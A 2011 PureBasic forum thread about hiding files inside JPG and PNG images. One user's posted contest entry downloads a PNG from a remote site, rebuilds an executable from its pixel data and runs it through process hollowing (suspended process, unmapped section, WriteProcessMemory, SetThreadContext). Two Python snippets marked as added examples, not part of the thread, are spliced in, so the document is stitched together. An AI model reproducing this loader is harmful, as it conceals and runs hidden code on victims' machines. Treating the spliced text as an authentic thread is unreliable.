hide files in a JPG image
Posted: Fri Apr 15, 2011 8:26 pm
by Rook Zimbabwe
This works!
Sandboxie uses it to track what you look at on the web. (I just had a cybersecurity class on it)
http://www.marcofolio.net/how_to/hide_f ... files.html
So anyone using sandboxie for their 4chan or other follies... y'all need to find a new methodology!
On the PB side perhaps we could store data for our apps this way as well?

Re: hide files in a JPG image
Posted: Fri Apr 15, 2011 9:11 pm
by c4s
Did I understand it correctly? The data is just added beyond the "end of jpg image" marker? This way image encoders just read the image and winrar (and probably other software as well) ignores the image and just shows the data... Not so exciting.
I think it would be interesting to put/hide data in special image meta fields (e.g. EXIF etc.) but there must be some kind of software that already does stuff like this.
Re: hide files in a JPG image
Posted: Fri Apr 15, 2011 11:03 pm
by TerryHough
Probably explains your "drive by malware install" problem.

Re: hide files in a JPG image
Posted: Sat Apr 16, 2011 1:36 am
by MachineCode
c4s wrote: The data is just added beyond the "end of jpg image" marker?
No, it just appends one file to the end of the other. Not after any marker. It's an old trick that's been around for years. There's like a million YouTube videos showing how to do it.
I fail to see what Sandboxie has to do with it. There's no tracking by Sandboxie with this method. Rook, can you please explain further what you mean by that? I think you've been given some wrong information.
TerryHough wrote: Probably explains your "drive by malware install" problem.

No, any executable appended to a JPG like this can't be executed.
Re: hide files in a JPG image
Posted: Sat Apr 16, 2011 9:26 am
by c4s
MachineCode wrote: c4s wrote: The data is just added beyond the "end of jpg image" marker?
No, it just appends one file to the end of the other. Not after any marker. It's an old trick that's been around for years. There's like a million YouTube videos showing how to do it.
Yes, but it technically results in what I've said.

Re: hide files in a JPG image
Posted: Sat Apr 16, 2011 6:20 pm
by thefool
MachineCode wrote:
No, any executable appended to a JPG like this can't be executed.
This is not true. There have been several examples where code attached to PDF and JPG files, just to take some examples, would be executed due to flaws in the software which processes these files (e.g.
http://www.microsoft.com/technet/securi ... 4-028.mspx to take one example).
You could use some buffer overflow in the decoder, viewer etc. to actually execute code located someplace else, for instance at the end of the file.
edit: Forgot to ask, can you enlighten us on what you mean with "Sandboxie uses it to track what you look at on the web"?
Re: hide files in a JPG image
Posted: Mon Apr 18, 2011 4:34 am
by Rook Zimbabwe
I was cleaning up my sandboxie folders and discovered two .jpg files that were HUGE and had very weird names and I could not delete them. The filenames were a combination of file names of every image I suppose the browser opened...
296 character filenames... which Win7 refused to deal with!
I tried a DEL *.jpg from the command line and the system balked a few times... I tried System Commander and that did not even SHOW the files but I could not rd or delete the folder as it was not "empty" (there is nothing shown in the folder in Opsys view or in DOS window view or in FileCommander view).
In PFM I saw the file and destroyed it.
Re: hide files in a JPG image
Posted: Mon Apr 18, 2011 8:50 am
by MachineCode
You haven't proved anything about Sandboxie, then. Sounds like it just sandboxed the malware files, which it should.
Re: hide files in a JPG image
Posted: Mon Apr 18, 2011 9:13 am
by freepurebasic
Make sure you have these in the same directory where you save the .pb:
for7z.jpg: a JPEG you want to hide
1.jpg: a normal image you want others to see when they double-click it
And make sure you have installed 7z (Windows / Linux Ubuntu + Wine)
http://www.7-zip.org/download.html
This code must hide your photo for7z.jpg inside 1.jpg and output secretimage.jpg as the result.
Code:
; Packs for7z.jpg into 1.7z with 7-Zip, then appends that archive to 1.jpg
; with "copy /b" and writes the result to secretimage.jpg (Windows version).
;
; Error state set by Registry_INTERNAL_SetError; must be Global to outlive the procedure
Global gRegistry_LastErrorDescription$, gRegistry_LastErrorCode

Procedure Registry_INTERNAL_SetError(errorCode)
  Protected *Buffer, len
  len = FormatMessage_(#FORMAT_MESSAGE_ALLOCATE_BUFFER|#FORMAT_MESSAGE_FROM_SYSTEM, 0, errorCode, 0, @*Buffer, 0, 0)
  If len
    gRegistry_LastErrorDescription$ = PeekS(*Buffer, len)
    LocalFree_(*Buffer)
  Else
    gRegistry_LastErrorDescription$ = "Errorcode: " + Hex(errorCode)
  EndIf
  gRegistry_LastErrorCode = errorCode
EndProcedure

; Reads a registry value and returns it as a string (numbers are converted with Str())
Procedure.s Registry_GetValueAsString(hKey, subKey$, valueName$, *type.INTEGER = 0)
  Protected errorCode = #ERROR_SUCCESS, result$, hKey1, bufferSize, type, value.q
  errorCode = RegOpenKeyEx_(hKey, subKey$, 0, #KEY_READ, @hKey1)
  If errorCode = #ERROR_SUCCESS
    If hKey1
      ; First call only asks for the value type and the required buffer size
      errorCode = RegQueryValueEx_(hKey1, valueName$, 0, @type, 0, @bufferSize)
      If errorCode = #ERROR_SUCCESS
        If *type
          *type\i = type
        EndIf
        Select type
          Case #REG_DWORD, #REG_QWORD
            errorCode = RegQueryValueEx_(hKey1, valueName$, 0, 0, @value, @bufferSize)
            If errorCode = #ERROR_SUCCESS
              result$ = Str(value)
            EndIf
          Case #REG_SZ, #REG_EXPAND_SZ
            If bufferSize
              value = AllocateMemory(bufferSize)
              If value
                errorCode = RegQueryValueEx_(hKey1, valueName$, 0, 0, value, @bufferSize)
                If errorCode = #ERROR_SUCCESS
                  result$ = PeekS(value)
                EndIf
                FreeMemory(value)
              Else
                errorCode = #ERROR_NOT_ENOUGH_MEMORY
              EndIf
            EndIf
        EndSelect
      EndIf
      RegCloseKey_(hKey1)
    EndIf
  EndIf
  Registry_INTERNAL_SetError(errorCode)
  ProcedureReturn result$
EndProcedure

imagetohide$ = "for7z.jpg"       ; this is what I want to hide in secretimage.jpg
fakeimage$   = "1.jpg"           ; this is what you will see when opening the JPEG normally
secretimage$ = "secretimage.jpg" ; open 7z, navigate to your path and open it; here you find what you hid

; The optional *type argument is simply left out of the call
Path7z$ = Registry_GetValueAsString(#HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\7zFM.exe", "Path")
Debug Path7z$

; Create the archive and wait until 7z has finished (replaces the fixed Delay(500))
RunProgram(Path7z$ + "\7z.exe", "a 1.7z " + imagetohide$, "", #PB_Program_Wait)

; Binary-concatenate the cover image and the archive, capturing the output of copy
Copy = RunProgram("c:\windows\system32\cmd.exe", "/c copy /b " + fakeimage$ + " + 1.7z " + secretimage$, "", #PB_Program_Open|#PB_Program_Read)
Output$ = ""
If Copy
  While ProgramRunning(Copy)
    If AvailableProgramOutput(Copy)
      Output$ + ReadProgramString(Copy) + Chr(13)
    EndIf
  Wend
  Output$ + Chr(13) + Chr(13)
  Output$ + "Exitcode: " + Str(ProgramExitCode(Copy))
  CloseProgram(Copy)
EndIf
MessageRequester("Output", Output$)
After this I will think about how to make a database to assign it inside an image file.
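Added example, not part of the original thread: a check for the kind of file the post above produces. It walks the JPEG segment structure to the real end-of-image (EOI) marker, so that an EXIF thumbnail's own EOI is not mistaken for it, and reports whatever follows; the function names, the signature table and the sample bytes are constructed for illustration.

```python
# Magic numbers of formats commonly found appended to images.
SIGNATURES = {b"7z\xbc\xaf\x27\x1c": "7z archive", b"PK\x03\x04": "ZIP archive",
              b"Rar!\x1a\x07": "RAR archive", b"MZ": "DOS/PE executable"}

def jpeg_end_offset(data: bytes) -> int:
    """Return the offset just past the EOI marker of the JPEG starting at data[0]."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:                      # EOI: the image ends here
            return pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:
            continue                            # standalone markers have no length field
        length = int.from_bytes(data[pos:pos + 2], "big")
        if length < 2:
            raise ValueError(f"bad segment length at offset {pos}")
        pos += length                           # skips APPn payloads, thumbnails included
        if marker == 0xDA:                      # SOS: entropy-coded scan data follows
            # FF00 is a stuffed data byte and FFD0-FFD7 are restart markers: keep scanning
            while pos + 1 < len(data) and (data[pos] != 0xFF or data[pos + 1] == 0x00
                                           or 0xD0 <= data[pos + 1] <= 0xD7):
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker")

def trailing_payload(data: bytes):
    """Return (offset, kind, size) of data after EOI, or None if nothing follows."""
    end = jpeg_end_offset(data)
    tail = data[end:]
    if not tail:
        return None
    kind = next((n for sig, n in SIGNATURES.items() if tail.startswith(sig)), "unknown")
    return end, kind, len(tail)

def segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

# Constructed sample (structurally valid, not a decodable picture).
SAMPLE_JPEG = (b"\xff\xd8"
               + segment(0xE1, b"Exif\x00\x00" + b"\xff\xd8\xff\xd9")  # thumbnail with own EOI
               + segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")            # SOS header
               + b"\x12\xff\x00\x34\xff\xd0\x56" + b"\xff\xd9")       # scan data, then EOI
SAMPLE_STEGO = SAMPLE_JPEG + b"7z\xbc\xaf\x27\x1c" + b"\x00" * 10     # appended archive header
```

A plain search for the first FF D9 in the sample stops inside the thumbnail at offset 16, which is why the segment lengths are followed instead.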
Re: hide files in a JPG image
Posted: Thu Jun 02, 2011 12:05 am
by Thorium
That's not really well hidden. There are better ways to hide stuff in images. On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixels. Or change the bit of every color channel, then you can store 3 bits per pixel.
Of course the image colors will be slightly different. But since we only use the lowest bit no one will notice the difference.
That's way better hidden. Not even the image's file size is changing. ^^
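Added example, not part of the original thread: the lowest-bit scheme described in the post above, applied to a raw buffer of RGB channel bytes (one bit per channel, so three bits per pixel). The function names and the sample pixel data are constructed; decoding a real lossless image into such a buffer is left out.

```python
def embed_lsb(channels: bytes, message: bytes) -> bytes:
    """Store the message bits (MSB first) in the lowest bit of successive channel bytes."""
    bits = [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]
    if len(bits) > len(channels):
        raise ValueError(f"need {len(bits)} channel bytes, have {len(channels)}")
    out = bytearray(channels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit      # clear the lowest bit, then set it to the data bit
    return bytes(out)

def extract_lsb(channels: bytes, n_bytes: int) -> bytes:
    """Rebuild n_bytes from the lowest bit of the first 8 * n_bytes channel bytes."""
    out = bytearray()
    for i in range(n_bytes):
        value = 0
        for c in channels[i * 8:(i + 1) * 8]:
            value = (value << 1) | (c & 1)
        out.append(value)
    return bytes(out)

def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest per-channel difference between two buffers of equal length."""
    return max(abs(x - y) for x, y in zip(a, b))

# Constructed cover: 16 RGB pixels = 48 channel bytes, enough for 48 bits = 6 characters.
COVER = bytes(40 + 3 * i for i in range(48))
STEGO = embed_lsb(COVER, b"secret")
```

The buffer length is unchanged and no channel moves by more than 1, so file size and a visual check say nothing here; only the lowest bit plane differs from the cover.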
Re: hide files in a JPG image
Posted: Thu Jun 02, 2011 1:16 am
by netmaestro
On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixel. Or change the bit of every color channel, then you can store 3 bits per pixel.
Interesting idea, I'm going to have a play with that when I get some time. Thanks for the tip!
Re: hide files in a JPG image
Posted: Thu Jun 02, 2011 3:39 am
by idle
Thorium wrote: That's not really well hidden. There are better ways to hide stuff in images. On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixels. Or change the bit of every color channel, then you can store 3 bits per pixel.
Of course the image colors will be slightly different. But since we only use the lowest bit no one will notice the difference.
That's way better hidden. Not even the image's file size is changing. ^^
Now why didn't I think about that with this purepunch!
Code:
;*****************************************************************************
;*
;* PurePunch Contest #4
;*
;* Name : Nova
;* Author : idle
;* Category : PurePunch Crunch | tricky bastard
;* Date : 16/9/2009
;* Notes : READ THE NOTES BEFORE RUNNING
;* : Windows only may not run on x64
;* : Make sure you have saved your work before running
;* : Will download image automatically, may take some time!
;* : Set your recording source to wave out mix and play your favourite song!
;* : run program, click splash screen to continue, right click for controls, esc to end
;* : If you haven't set your recording to wave out mix and only see a black screen
;* : right click the screen and choose the "normal option"
;* : For full instructions on Nova controls Goto http://www.idlearts.com/nova.html
;*****************************************************************************
Macro wp(a,b,c,d,e):WriteProcessMemory_(a,b,c,d,e):EndMacro:Structure K:SN.b[8]
StructureUnion:Pha.l:Vs.l:EndStructureUnion:Va.l:Sr.l:pRd.l:ptrl.l:pln.l:nr.w
nol.w:Cs.l:EndStructure:Structure V:V.K[95]:EndStructure:Structure pinf
hP.i:hT.i:pId:i:TId.i:EndStructure:Procedure R(f,n.s):*idh.IMAGE_DOS_HEADER=f
*s.V:pi.PINF:*n.IMAGE_NT_HEADERS:si.STARTUPINFO:lBA.l:Ctx.CONTEXT:Addr.l
r.l:i.l:CreateProcess_(0,n,0,0,0,4,0,0,@si,@pi):Ctx\ContextFlags=65538
If GetThreadContext_(pi\hT,Ctx):ReadProcessMemory_(pi\hP,Ctx\Ebx+8,@Addr,4,0)
If Not ZwUnmapViewOfSection_(Pi\hP,Addr):*n=f+*idh\e_lfanew:ts=PeekL(*n+52)
tt=PeekL(*n+80):ty=PeekL(*n+84):tz=*n\OptionalHeader:tq=PeekW(*n+6)-1
lBA=VirtualAllocEx_(pi\hP,ts,tt,12288,64):WP(pi\hP,lBA,f,ty,@r):tf=PeekW(*n+20)
*s=tz+tf:For i=0 To tq:WP(pi\hP,lBA+*s\V[i]\Va,f+*s\V[i]\pRd,*s\V[i]\Sr,@r)
Next:WP(pi\hP,Ctx\Ebx+8,@lBA,4,0):te=PeekL(*n+40):Ctx\Eax=lBA+te
SetThreadContext_(pi\hT,Ctx):ResumeThread_(pi\hT):End:EndIf:EndIf:End
EndProcedure:Global *o,q,w=512,h=460,fi.s="http://www.idlearts.com/sn5.png"
If FileSize("sn5.png")=-1:InitNetwork():ReceiveHTTPFile(fi,"sn5.png"):EndIf
UsePNGImageDecoder():LoadImage(2,"sn5.png"):OpenWindow(0,0,0,w,h,"",2147483649)
ImageGadget(1,0,0,w,h,ImageID(2)):*o=AllocateMemory(75264)
StartDrawing(ImageOutput(2)):While a<75264:tb=Point(b%512,(b/512))>>16 &$FF
PokeB(*o+a,tb):a+1:b+4:Wend:StopDrawing():Repeat:WaitWindowEvent()
ea=EventGadget():If ea=1:q=1:EndIf:Until q:If q=1:r(*o,ProgramFilename()):EndIf
Re: hide files in a JPG image
Posted: Thu Jun 02, 2011 11:45 am
by netmaestro
Doesn't run here, says element in structure pinf needs a declared type.
Re: hide files in a JPG image
Posted: Thu Jun 02, 2011 10:21 pm
by idle
Maybe it only worked on XP; it was a couple of years ago.
Anyway, that was what I was meaning. I don't think I had enough room to hide the program in the last byte.
